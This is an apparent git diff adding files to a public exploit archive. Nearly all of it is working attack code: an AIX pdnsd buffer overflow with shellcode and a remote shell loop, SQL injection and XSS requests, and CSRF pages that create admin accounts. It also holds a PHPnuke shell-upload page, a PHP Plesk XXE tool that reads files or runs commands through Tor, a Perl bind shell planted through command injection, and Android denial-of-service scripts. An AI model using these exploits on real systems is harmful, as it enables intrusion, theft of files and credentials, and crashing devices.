"\x90\xbf\xff\x14" /* st r5,-236(r31) */
"\x88\x55\xff\xf4" /* lbz r2,-12(r21) */
"\x98\xbf\xff\x0f" /* stb r5,-241(r31) */
"\x7e\xa9\x03\xa6" /* mtctr r21 */
"\x4e\x80\x04\x20" /* bctr */
"/bin/sh"
;
char nop[]="\x7f\xff\xfb\x78";
main(int argc,char **argv){
char buffer[10000],address[4],*b;
int i,n,l,cnt,sck;
struct hostent *hp;
struct sockaddr_in adr;
printf("copyright LAST STAGE OF DELIRIUM oct 1999 poland //lsd-pl.net/\n");
printf("pdnsd for AIX 4.1 4.2 PowerPC/POWER\n\n");
if(argc!=3){
printf("usage: %s address 41|42\n",argv[0]);exit(-1);
}
switch(atoi(argv[2])){
case 41: memcpy(&syscallcode[32],SCAIX41,12); break;
case 42: memcpy(&syscallcode[32],SCAIX42,12); break;
default: exit(-1);
}
sck=socket(AF_INET,SOCK_STREAM,0);
adr.sin_family=AF_INET;
adr.sin_port=htons(4242);
if((adr.sin_addr.s_addr=inet_addr(argv[1]))==-1){
if((hp=gethostbyname(argv[1]))==NULL){
errno=EADDRNOTAVAIL;perror("error");exit(-1);
}
memcpy(&adr.sin_addr.s_addr,hp->h_addr,4);
}
if(connect(sck,(struct sockaddr*)&adr,sizeof(struct sockaddr_in))<0){
perror("error");exit(-1);
}
l=ADRNUM+NOPNUM+strlen(shellcode);
*((unsigned long*)address)=htonl(0x2ff20908+(NOPNUM>>1));
i=sizeof(struct sockaddr_in);
if(getsockname(sck,(struct sockaddr*)&adr,&i)==-1){
struct netbuf {unsigned int maxlen;unsigned int len;char *buf;}nb;
ioctl(sck,(('S'<<8)|2),"sockmod");
nb.maxlen=0xffff;
nb.len=sizeof(struct sockaddr_in);;
nb.buf=(char*)&adr;
ioctl(sck,(('T'<<8)|144),&nb);
}
n=ntohs(adr.sin_port);
printf("port=%d connected! ",n);fflush(stdout);
findsckcode[0+2]=(unsigned char)((n&0xff00)>>8);
findsckcode[0+3]=(unsigned char)(n&0xff);
b=buffer;
*((unsigned long*)b)=htonl(l);
b+=4;
for(i=0;i<NOPNUM;i++) *b++=nop[i%4];
for(i=0;i<strlen(syscallcode);i++) *b++=syscallcode[i];
for(i=0;i<strlen(findsckcode);i++) *b++=findsckcode[i];
for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];
for(i=0;i<ALLIGN;i++) *b++=address[i%4];
for(i=0;i<ADRNUM;i++) *b++=address[i%4];
*b=0;
write(sck,buffer,4+l-1);sleep(3);
send(sck,"x",1,0);
printf("sent!\n");
write(sck,"/bin/uname -a\n",14);
while(1){
fd_set fds;
FD_ZERO(&fds);
FD_SET(0,&fds);
FD_SET(sck,&fds);
if(select(FD_SETSIZE,&fds,NULL,NULL,NULL)){
int cnt;
char buf[1024];
if(FD_ISSET(0,&fds)){
if((cnt=read(0,buf,1024))<1){
if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
else break;
}
write(sck,buf,cnt);
}
if(FD_ISSET(sck,&fds)){
if((cnt=read(sck,buf,1024))<1){
if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
else break;
}
write(1,buf,cnt);
}
}
}
}

43
exploits/aix/webapps/10372.txt Normal file
View file

@ -0,0 +1,43 @@
*******************************Blind SQL/XPath injection in OPMANAGER***********************************88
# Exploit Title: Blind SQL/XPath injection in OPMANAGER
# Date: 8-Dec-09
# Author: Asheesh Kumar Mani Tripathi
# AKS IT Services
# Software Link: http://www.manageengine.com/products/opmanager/download.html
# Version: [app version]
Description
SQL injection is a vulnerability that allows an attacker to alter backend SQL statements by manipulating the user input. An SQL injection occurs when web applications accept user input that is directly placed into a SQL statement and doesn't properly filter out dangerous characters. This is one of the most common application layer attacks currently being used on the Internet. Despite the fact that it is relatively easy to protect against, there is a large number of web applications vulnerable to SQL Injection.
XPath Injection is an attack technique used to exploit web sites that construct XPath queries from user-supplied input.
Impact
An unauthenticated attacker may execute arbitrary SQL/XPath statements on the vulnerable system. This may compromise the integrity of your database and/or expose sensitive information.
Vulnerable:
http://<Ip adress:8060>overview.do?selectedTab=Home&operation=showVoipDashboard_ajax&requestType=AJAX[Sql injectio ]&isFromInfra=yes HTTP/1.0
Get
overview.do?selectedTab=Home&operation=showVoipDashboard_ajax&requestType=AJAX'+and+313
37-31337=0+--+&isFromInfra=yes HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: localhost:8060
Cookie: JSESSIONID=54FA92CB3ADBA4C71B35C69251FFE9A1;flashversionInstalled=0.0.0
Connection: Close
Pragma: no-cache
Request:
HTTP/1.1 200 OK
Date: Tues, 08 Dec 2009 11:26:21 GMT
Server: Apache/2.0.47 (Win32) mod_jk/1.2.5
Connection: close
Content-Type: text/html;charset=UTF-8

77
exploits/aix/webapps/11580.txt Normal file
View file

@ -0,0 +1,77 @@
==============================================================================
[»] Thx To : [ Jiko ,H.Scorpion ,Dr.Bahy ,T3rr0rist ,Golden-z3r0 ,Shr7 Team . ]
==============================================================================
[»] FileExecutive Multiple Vulnerabilities
==============================================================================
[»] Script: [ FileExecutive v1.0.0 ]
[»] Language: [ PHP ]
[»] Site page: [ FileExecutive is a web-based file manager written in PHP. ]
[»] Download: [ http://sourceforge.net/projects/fileexecutive/ ]
[»] Founder: [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
[»] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & Islam-Defenders.Org ]
[»] My Home: [ HackTeach.Org , Islam-Attack.Com ]
###########################################################################
===[ Exploits ]===
Add/Edit Admin CSRF:
<html>
<head>
<title>FileExecutive Remote Add Admin Exploit [By:MvM]</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>
<body>
<form action='http://localhost/scripts/file/admin/add_user.php' method='POST' onSubmit='return chk(this)'>
<th colspan='5'>Add A user<hr></th>
<td>Username:</td>
<input type='text' name='username' value='' maxlength='32' onkeyup="showHint(this.value)">
<Br>
<td>Password:</td>
<input type='text' name='password' value=''>
<Br>
<td>Name:</td>
<input type='text' name='name' value='' maxlength='32'>
<Br>
<td>Root Directory:</td>
<input type='text' name='root' value='' maxlength='200'>
<Br>
<td>Max Upload Size:</td>
<input type='text' name='uload_maxsize' value='' size='8'>
<Br>
<select name='multiplier'>
<option value='1' selected>Bytes</option>
<option value='1024'>KB</option>
<option value='1048576'>MB</option>
</select>
<td>Group:</td><td><select name='groupid' id='groupid'><option value='0' selected>No Group</option></select></td>
<td>Use Group permissions?</td><td>Yes:<input type='radio' name='grp_perms' value='1'></td><td>No:<input type='radio' name='grp_perms' value='0' id="abc" checked></td>
<td>Is user Admin?</td><td>Yes:<input type='radio' name='admin' value='1'></td><td>No:<input type='radio' name='admin' value='0' id="abc" checked>
<td colspan='2'><fieldset><legend>Permissions</legend>
<td><input type='checkbox' name='mkfile' value='1'>Create File</td> <td><input type='checkbox' name='mkdir' value='1'>Create Folder</td>
<td><input type='checkbox' name='uload' value='1'>Upload</td> <td><input type='checkbox' name='rename' value='1'>Rename</td>
<td><input type='checkbox' name='delete' value='1'>Delete</td> <td><input type='checkbox' name='edit' value='1'>Edit</td>
<td><input type='checkbox' name='dload' value='1'>Download</td> <td><input type='checkbox' name='chmod' value='1'>Chmod</td>
<td><input type='checkbox' name='move' value='1'>Move</td> <td> </td></tr>
<td colspan='2'><input type='submit' value='Add User' name='sub'> <input type='button' value='Cancel' onclick='top.location="index.php"'></td>
</form>
</body>
</html>
Shell Upload:
[»] By Go To The End Of Page & Browse Your Shell 2 upload it <-=- Remote File Upload Vulnerability
Local File Disclosure:
[»] http://localhost/[path]/download.php?file=./LFD <-=- Local File Disclosure Vulnerability
Full Path Disclosure:
[»] http://localhost/[path]/listdir.php?dir=./FPD <-=- Full Path Disclosure Vulnerability
Author: ViRuSMaN <-
###########################################################################

149
exploits/aix/webapps/14058.html Normal file
View file

@ -0,0 +1,149 @@
# Title : PHPnuke 8.2 Remote Upload File Exploit
# Author : Net.Edit0r
# Location : Iran
# Dork : "POWERED BY PHPNUKE.IR"
# Category : Remote
# Email : Net.Edit0r@Att.net ~ Black.Hat.TM@Gmail.com
# Special Thanks To :NetQurd (For help in finding bugs) > Email
:NetQurd@Live.CoM
[~]######################################### InformatioN
#############################################[~]
[~] 1.Save code html format
[~] 2.Search Target.com
[~] 3.Edit and replace & Target
[~] 4.Save Html Page
[~] 5.Open Page Html (Edite Source)
[~] 6.Set Format PHP
[~] 7.Choose File & Upload
[~] 8.Formats can be uploaded (Html.Htm.Jpg.gif.Xml....)
[~] 9.Target.com/images/uploads/File/File Name
[~]######################################### ExploiT
#############################################[~]
[~] 1. Exploit File :
<!--
* FCKeditor - The text editor for Internet - http://www.Sun
* Test page for the File Browser connectors.
-->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>FCKeditor - By Net.Edit0r</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
</head>
<body>
<table height="100%" cellspacing="0" cellpadding="0" width="100%"
border="0">
<tr>
<td>
<table cellspacing="0" cellpadding="0" border="0">
<tr>
<td>
Connector:<br />
<select id="cmbConnector" name="cmbConnector">
<option value="asp/connector.asp" selected="selected">ASP</option>
<option value="aspx/connector.aspx">ASP.Net</option>
<option value="cfm/connector.cfm">ColdFusion</option>
<option value="lasso/connector.lasso">Lasso</option>
<option value="perl/connector.cgi">Perl</option>
<option value="
http://Target.com/includes/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php
">PHP</option>
<option value="py/connector.py">Python</option>
</select>
</td>
<td>
</td>
<td>
Current Folder<br />
<input id="txtFolder" type="text" value="/" name="txtFolder" /></td>
<td>
</td>
<td>
Resource Type<br />
<select id="cmbType" name="cmbType">
<option value="File" selected="selected">File</option>
<option value="Image">Image</option>
<option value="Flash">Flash</option>
<option value="Media">Media</option>
<option value="Invalid">Invalid Type (for testing)</option>
</select>
</td>
</tr>
</table>
<br />
<table cellspacing="0" cellpadding="0" border="0">
<tr>
<td valign="top">
<a href="#" onclick="GetFolders();">Get Folders</a></td>
<td>
</td>
<td valign="top">
<a href="#" onclick="GetFoldersAndFiles();">Get Folders and Files</a></td>
<td>
</td>
<td valign="top">
<a href="#" onclick="CreateFolder();">Create Folder</a></td>
<td>
</td>
<td valign="top">
<form id="frmUpload" action="" target="eRunningFrame" method="post"
enctype="multipart/form-data">
File Upload<br />
<input id="txtFileUpload" type="file" name="NewFile" />
<input type="submit" value="Upload" onclick="SetAction();" />
</form>
</td>
</tr>
</table>
<br />
URL: <span id="eUrl"></span>
</td>
</tr>
<tr>
<td height="100%" valign="top">
<iframe id="eRunningFrame" src="javascript:void(0)" name="eRunningFrame"
width="100%"
height="100%"></iframe>
</td>
</tr>
</table>
</body>
</html>
[~]######################################## ThankS To ...
#########################################[~]
[~] Special Thanks To My Best FriendS :
NetQard , B3hz4d , Raiden , ~[ CriMe ]~ , † CoNstaNtine † , _R3v4l_ ,
~~XTerror~~ , __l2o5v4__ , Zend
[~] IRANIAN Young HackerZ
[~] GreetZ : Sun-Army.Org , Phc.Ir , Dark-tunnel.com , AttackerZ.IR
[~]######################################### FinisH :D
#############################################[~]

54
exploits/aix/webapps/21319.txt Normal file
View file

@ -0,0 +1,54 @@
# Exploit Title: Trend Micro InterScan Messaging Security Suite Stored XSS and CSRF
# Date: 13/09/2012
# Exploit Author: modpr0be (modpr0be[at]spentera.com)
# Vendor Homepage: http://www.trendmicro.com
# Software Link: http://www.trendmicro.com/ftp/products/interscan/IMSS_v7.1_Win_1394.zip
# Version: 7.1-Build_Win32_1394
# Tested on: Windows 2003 Standard Edition, XAMPP 1.7.4 (Default Config)
# CVE : CVE-2012-2995, CVE-2012-2996
# Software Description
# TrendMicro Interscan Messaging Security is the industrys most comprehensive
# mail gateway security. Choose state-of-the-art software or a hybrid solution
# with on-premise virtual appliance and optional cloud pre-filter that blocks
# the vast majority of spam and malware outside your network. Plus our Data
# Privacy and Encryption Module secure outbound data to ensure privacy and
# regulatory compliance.
# Vulnerability Overview
# Trend Micro InterScan Messaging Security Suite is susceptible to cross-site scripting (CWE-79)
# and cross-site request forgery (CWE-352) vulnerabilities.
# Proof of Concept
# Persistent/Stored XSS
# this POC will store defined URL to white list URL page. Each time we access to this page, the XSS word
# will pop up to the user. You can change the alert message box to something nasty (e.g redirect to beef??)
hxxps://127.0.0.1:8445/addRuleAttrWrsApproveUrl.imss?wrsApprovedURL=xssxss"><script>alert('XSS')</script>
# Non-persistent/Reflected XSS
# This is non-persistent XSS, you might lure target user to click this link :)
hxxps://127.0.0.1/initUpdSchPage.imss?src="><script>alert('XSS')</script>
# Cross-Site Request Forgery
# This POC should be targeted to user with admin privilege
# It will add admin user with user quorra, and password quorra.123
# Target victim must be authenticated when perform this POC
<html>
<body>
<form action="hxxps://127.0.0.1:8445/saveAccountSubTab.imss" method="POST">
<input type="hidden" name="enabled" value="on" />
<input type="hidden" name="authMethod" value="1" />
<input type="hidden" name="name" value="quorra" />
<input type="hidden" name="password" value="quorra.123" />
<input type="hidden" name="confirmPwd" value="quorra.123" />
<input type="hidden" name="tabAction" value="saveAuth" />
<input type="hidden" name="gotoTab" value="saveAll" />
<input type="submit" value="CSRF" />
</form>
</body>
</html>
# References
# http://www.spentera.com/advisories/2012/SPN-05-2012.html
# http://www.kb.cert.org/vuls/id/471364
# http://www.trendmicro.com/us/enterprise/network-security/interscan-message-security/index.html

105
exploits/aix/webapps/33736.php Normal file
View file

@ -0,0 +1,105 @@
# Exploit Title: Plesk SSO XXE injection (Old bug) Exploit #
# Date: 12 06 2014 #
# Exploit Author: z00 #
# Software Link: http://www.parallels.com/ #
# Version: 11.0.9 10.4.4 #
# Tested on: linux all #
<?php
/*
████████████████████████████
█______¶¶¶¶¶¶______________█
█____¶¶¶¶¶¶¶¶¶¶____________█
█___¶¶¶¶¶¶¶¶¶¶¶¶¶__________█
█__¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶_________█
█_¶¶¶¶¶¶¶______¶¶¶_________█
█_¶¶¶¶¶¶________¶¶__¶¶_____█
█_¶¶¶¶¶¶____________¶¶¶____█
█_¶¶¶¶¶_____________¶¶¶¶¶¶_█
█_¶¶¶¶¶____________¶¶¶¶¶¶¶_█
█_¶¶¶¶¶___________¶¶¶¶¶¶¶__█
█_¶¶¶¶¶____________¶¶¶¶¶¶__█
█_¶¶¶¶¶_____________¶¶¶¶¶¶_█
█_¶¶¶¶¶¶____________¶¶¶_¶¶_█
█__¶¶¶¶¶¶______¶¶___¶¶_____█
█__¶¶¶¶¶¶¶____¶¶¶__________█
█___¶¶¶¶¶¶¶¶¶¶¶¶___________█
█____¶¶¶¶¶¶¶¶¶¶____________█
█_____¶¶¶¶¶¶¶______________█
████████████████████████████
Plesk SSO XXE injection (Old bug) Exploit
Coded by z00 (electrocode)
Twitter: electrocode
Not: Tor kurulu değilse proxy kismini kaldirin
Bug founded http://makthepla.net/blog/=/plesk-sso-xxe-xss
Tüm İslam Aleminin Beraat gecesi mubarek olsun dua edin:)
*/
function Gonder($domain,$komut,$method){
switch($method)
{
case "cmd":
$komut = "expect://$komut";
break;
case "read":
$komut = "file://$komut";
break;
default:
$komut = "file://$komut";
}
$adres = "https://$domain:8443/relay";
$paket = "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?><!DOCTYPE doc [ <!ENTITY xxe SYSTEM \"$komut\"> ] >
<samlp:AuthnRequest xmlns:samlp=\"urn:oasis:names:tc:SAML:2.0:protocol\" xmlns:saml=\"urn:oasis:names:tc:SAML:2.0:assertion\" ID=\"dff578c3049f5ba10223df820123fcccbc134e7520\" Version=\"2.0\" IssueInstant=\"2014-05-08T11:58:33Z\" Destination=\"javascript:prompt(document.domain,document.cookie)\"> <saml:Issuer>&xxe;</saml:Issuer> <samlp:Extensions> <UI><URL>&xxe;</URL></UI> </samlp:Extensions> <ds:Signature xmlns:ds=\"http://www.w3.org/2000/09/xmldsig#\"> <ds:SignedInfo><ds:CanonicalizationMethod Algorithm=\"http://www.w3.org/2001/10/xml-exc-c14n#\"/> <ds:SignatureMethod Algorithm=\"http://www.w3.org/2000/09/xmldsig#rsa-sha1\"/> <ds:Reference URI=\"#dff578c3049f5ba10223df820123fcccbc134e7520\"><ds:Transforms><ds:Transform Algorithm=\"http://www.w3.org/2000/09/xmldsig#enveloped-signature\"/><ds:Transform
Algorithm=\"http://www.w3.org/2001/10/xml-exc-c14n#\"/></ds:Transforms><ds:DigestMethod Algorithm=\"http://www.w3.org/2000/09/xmldsig#sha1\"/><ds:DigestValue>5BWiyX9zvACGR5y+NB2wxuXJtJE=</ds:DigestValue></ds:Reference></ds:SignedInfo><ds:SignatureValue>S4LhCUOB0ylT4cjXUVAbnvrBjBBzybaxvWHTGw9JnRsyUB1MetRK+VHvV/M3Q4NX0DGUNFXlCZR3sM2msQOAhbjZxkKQCNUBig56/03pgsXlpWJFhnBL8m0sRRZBduf4QdHn/hxxyvAKzadPQ5nmIPmCPpO1CQsRUTMrt/13VIE=</ds:SignatureValue> </ds:Signature></samlp:AuthnRequest>";
$exploit = urlencode(base64_encode($paket));
$relaystate = gethostbyname($domain);
$relayadres = urlencode(base64_encode($relaystate));
$postlar = "SAMLRequest=$exploit&response_url=http://hax&RelayState=$relayadres&RefererScheme=https&RefererHost=https://$domain:8443&RefererPort=8443";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$adres);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13');
curl_setopt($ch, CURLOPT_REFERER,$adres);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
//Proxy
curl_setopt($ch, CURLOPT_PROXY, "127.0.0.1:9050");
curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
//Proxy end
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_POSTFIELDS,$postlar );
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$sonuc = curl_exec ($ch);
curl_close ($ch);
$gelenpaket = //"Paket: " . $postlar .
"Gonderilen Paket Boyutu: " . strlen($exploit)."\nRelayAdres: $relaystate\nSonuc: \r\n\r\n$sonuc \n";
return $gelenpaket;
}
if($argc < 4){
$kullanim = "########################################################################\n";
$kullanim .= "Plesk XXE Exploit Tool by z00\n";
$kullanim .= "Kullanimi : php $argv[0].php domain /etc/passwd read \n";
$kullanim .= "Example : php $argv[0].php adres cmd (only expect installed) method \n";
$kullanim .= "Kullanilabilir Methodlar : \ncmd (Expect kurulu ise)\nread (Dosya okur) \n";
$kullanim .= "########################################################################\r\n";
echo $kullanim;
} else {
$domain = $argv[1];
$komut = $argv[2];
$method = $argv[3];
echo Gonder($domain,$komut,$method);
}
?>

41
exploits/aix/webapps/41546.txt Normal file
View file

@ -0,0 +1,41 @@
Bull Clusterwatch/Watchware is a VERY VERY OLD tool used by sysadmins to manage their AIX clusters.
Marble effect in the web banner and questionable font: it smells the 90s !
Tool is mainly a web app with CGIs (shell scripts and binaries) and we have found three vulnerabilities in it:
Trivial admin credentials
Authenticated user can write on the system file
Authenticated user can inject OS commands
By combining these three vulnerabilities an attacker can fully compromise servers running Watchware.
We tried to contact Bull to report this more than one year ago without any success, but the devs are probably retired now so that doesnt matter, lets do some archeology alone.
Here are the details:
1. Trivial creds: smwadmin/bullsmw
2. Authenticated user can write on the system file
A page allows sysadmins to customize a few things including filters that are used in the process listing page (the tool allows you to list your running processes).
But these filters are written on disk and you can call them using the following OS command injection.
Request to write the shellcode:
http://host:9696/clw/cgi-bin/adm/bclw_updatefile.cgi?cluster=clustername&node=nodename&alarm=%0D%0Aswap_adapter%0D%0Anode_down%0D%0Anode_up%0D%0Anetwork_down%0D%0Anetwork_up%0D%0Astate%0D%0Ahacmp%0D%0Astop%0D%0Aaix%0D%0A&day=1%0D%0A2%0D%0A3%0D%0A4%0D%0A5%0D%0A6%0D%0A7%0D%0A8%0D%0A15%0D%0A30%0D%0A45%0D%0A0%0D%0A&hour=0%0D%0A1%0D%0A2%0D%0A3%0D%0A4%0D%0A5%0D%0A6%0D%0A12%0D%0A18%0D%0A23%0D%0A&proc=perl%20-e%20'use%20Socket;$p=2222;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));bind(S,sockaddr_in($p,%20INADDR_ANY));listen(S,SOMAXCONN);for(;$p=accept(C,S);close%20C){open(STDIN,">%26C");open(STDOUT,">%26C");open(STDERR,">%26C");exec("/bin/ksh%20-i");};'%0D%0A%0D%0A&lpp=%0D%0Acluster%0D%0A&refr=0%0D%0A
The shellcode we used:
perl -e 'use Socket;$p=2223;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));bind(S,sockaddr_in($p, INADDR_ANY));listen(S,SOMAXCONN);for(;$p=accept(C,S);close C){open(STDIN,">&C");open(STDOUT,">&C");open(STDERR,">&C");exec("/bin/ksh -i");};'
3. Authenticated user can inject OS commands
When listing the processes you can apply a filter… and inject a single command using backticks, great !
Very useful to execute our shellcode which was stored in a single file (the filter).
Request to execute the shellcode:
http://host:9696/clw/cgi-bin/adm/bclw_stproc.cgi?cluster=clustername&node=nodename&proc_filter=smw`/usr/sbin/bullcluster/monitoring/clw/web/conf/proc_filter.txt`"

31
exploits/alpha/webapps/47633.txt Normal file
View file

@ -0,0 +1,31 @@
# Exploit Title: Prima Access Control 2.3.35 - 'HwName' Persistent Cross-Site Scripting
# Google Dork: NA
# Date: 2019-11-11
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/
# Software Link: https://www.computrols.com/building-automation-software/
# Version: 2.3.35
# Tested on: NA
# CVE : CVE-2019-7671
# Advisory: https://applied-risk.com/resources/ar-2019-007
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
# Prima Access Control 2.3.35 Authenticated Stored XSS
# PoC
POST /bin/sysfcgi.fx HTTP/1.1
Host: 192.168.13.37
Connection: keep-alive
Content-Length: 265
Origin: https://192.168.13.37
Session-ID: 10127047
User-Agent: Mozi-Mozi/44.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/html, */*; q=0.01
Session-Pc: 2
X-Requested-With: XMLHttpRequest
Referer: https://192.168.13.37/app/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
<requests><request name="CreateDevice"><param name="HwType" value="1000"/><param name="HwParentID" value="0"/><param name="HwLogicParentID" value="0"/><param name="HwName" value=""><script>alert("XSSz")</script>"/></request></requests>

82
exploits/android/dos/18630.txt Normal file
View file

@ -0,0 +1,82 @@
# Exploit Title: Android FTPServer 1.9.0 Remote DoS
# Date: 03/20/12
# Author: G13
# Twitter: @g13net
# Software Site: https://sites.google.com/site/andreasliebigapps/ftpserver/
# Download Link: http://www.g13net.com/ftpserver.apk
# Version: 1.9.0
# Category: DoS (android)
#
##### Vulnerability #####
FTPServer is vulnerable to a DoS condition when long file names are
repeatedly attempted to be written via the STOR command.
Successful exploitation will causes devices to restart.
Android Security Team has confirmed this issue.
I have been able to test this exploit against Android 2.2 and 2.3.
4.0 (ICS) appears not to be vulnerable.
##### Vendor Timeline #####
Android Security Team:
10/20/11 - Vendor Notified of vulnerability, Vendor notifies me they will
be looking into the issue
10/21/11 - vendor Requests bug report from device, bug report sent, PoC
Code Delivered to Vendor
10/24/11 - Asked Vendor Status, stated I have been able to duplicate issue
on multiple devices
10/25/11 - Vendor states they are still working on it
10/30/11 - Current Status asked
10/31/11 - vendor Replies no updates
11/7/11 - Emailed Vendor, they ask for more clarification on issue. I
submit more details
11/8/11 - Vendor acknowledges that it is not the APK itself causing the
crashes. Vendor also confirms full reboots from PoC code.
11/9/11 - Vendor asks if I am just crashing application or device in
certain instances. I state device is restarting.
11/11/11 - I ask if there is anything more I may assist with. Vendor
states they have isolated the impacted component and are working on a
fix.
11/18/11 - Current status Asked.
12/8/11 - Update requested, response that they will contact Kernel team for
an update
01/13/12 - Current status asked, no response
03/06/12 - Current status asked, no response
03/20/12 - Disclosure
Developer:
1/24/12 - Developer contacted
1/25/12 - Developer Responds
1/27/12 - Supplied Developer with PoC code, Developer confirms issue
1/29/12 - Developer releases new version
3/20/12 - Disclosure
##### PoC #####
#!/usr/bin/python
# Android FTPServer PoC Device Crash
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer = "STOR " + "A" * 5000 + "\r\n"
for x in xrange(1,31):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print x
s.connect(('172.16.30.108',2121))
data=s.recv(1024)
s.send("USER test\r\n")
data=s.recv(1024)
s.send("PASS test\r\n")
s.send(buffer)
s.send("QUIT")
s.close()

92
exploits/android/dos/23248.txt Normal file
View file

@ -0,0 +1,92 @@
# Exploit Title: Android Kernel 2.6 Local DoS
# Date: 12/7/12
# Author: G13
# Twitter: @g13net
# Versions: Android 2.2, 2.3
# Category: DoS (android)
#
##### Vulnerability #####
The Android OS is vulnerable to a local DoS when a filename with a
length of 2048
or larger is attempted to be written to the sdcard(vfat fs) multiple times.
The result of successful running of the exploit code is the system restarting.
The vulnerability only effects Android kernels that are in the version
2.6 family.
##### Vendor Timeline #####
The Android Security Team has been contacted with updated PoC code and
details.
They have been aware of this vulnerability for over a year.
##### Tombstone #####
*** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
Build fingerprint:
'verizon/SCH-I800/SCH-I800:2.3.4/GINGERBREAD/EF01:user/release-keys'
pid: 349, tid: 363, name: SensorService >>> system_server <<<
signal 8 (SIGFPE), code -6 (?), fault addr 0000015d
r0 00000000 r1 00000008 r2 00000040 r3 00000000
r4 2a114310 r5 00000000 r6 51504690 r7 00000025
r8 2a114330 r9 2a114350 sl 00000003 fp 00000003
ip fffd4084 sp 51501eb0 lr 40039b70 pc 40037cf0 cpsr 20030010
d0 4271bc7bd0b80000 d1 0000000000000000
d2 0000000000000000 d3 427181eae9200000
d4 0000000000000000 d5 0000000000000000
d6 0000000000000000 d7 0000000000000000
d8 0000000000000000 d9 0000000000000000
d10 0000000000000000 d11 0000000000000000
d12 0000000000000000 d13 0000000000000000
d14 0000000000000000 d15 0000000000000000
d16 3fe99999a0000000 d17 3fe999999999999a
d18 0033003200310030 d19 0000000000000000
d20 3fc554e7eb0eb47c d21 3e66376972bea4d0
d22 3f4de16b9c24a98f d23 3fb0f4a31edab38b
d24 3fede16b9c24a98f d25 3fe55559ee5e69f9
d26 0000000000000000 d27 0000000000000000
d28 0000000000000005 d29 0000000000000000
d30 0000000000000000 d31 0000000000000000
scr 20000010
backtrace:
#00 pc 0000dcf0 /system/lib/libc.so (kill+12)
#01 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)
#02 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)
#03 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)
#04 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)
#05 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)
#06 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)
#07 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)
#08 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)
#09 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)
#10 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)
#11 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)
#12 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)
#13 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)
#14 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)
#15 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)
#16 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)
##### PoC #####
#include <stdio.h>
int main(int argc, char** argv) {
char buf[5000];
int j,k;
FILE *fp;
/* Path to sdcard, typically /sdcard/ */
strcpy(buf,"/sdcard/");
for(k=0;k<=2048;k++){
strcat(buf,"A");
};
for(j=0;j<=50;j++){
fp=fopen(buf,"w");
};
return 0;
}

511
exploits/android/dos/28957.txt Normal file
View file

@ -0,0 +1,511 @@
################# BootReceiver.java ##################
/**
* Android Application that performs the fork bomb attack http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3918
*
* Further informations can be found at http://www.ai-lab.it/bugAndroid/bugAndroid.html
*
*
* @author Luca Verderame <luca.verderame@unige.it>
* @version 1.0
*
* Copyright 2012 Luca Verderame
*
* This file is part of ZygoteVulnerability.
ZygoteVulnerability is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
ZygoteVulnerability is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with ZygoteVulnerability. If not, see <http://www.gnu.org/licenses/>.
*
*/
package it.ailab;
import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.util.Log;
public class BootReceiver extends BroadcastReceiver{
@Override
public void onReceive(Context context, Intent intent) {
Log.d("BOOT","boot completed. starting service");
Intent intentReceiver = new Intent();
intentReceiver.setAction("it.ailab.ServiceDOS");
context.startService(intentReceiver);
}
}
################# ServiceDOS.java ##################
/**
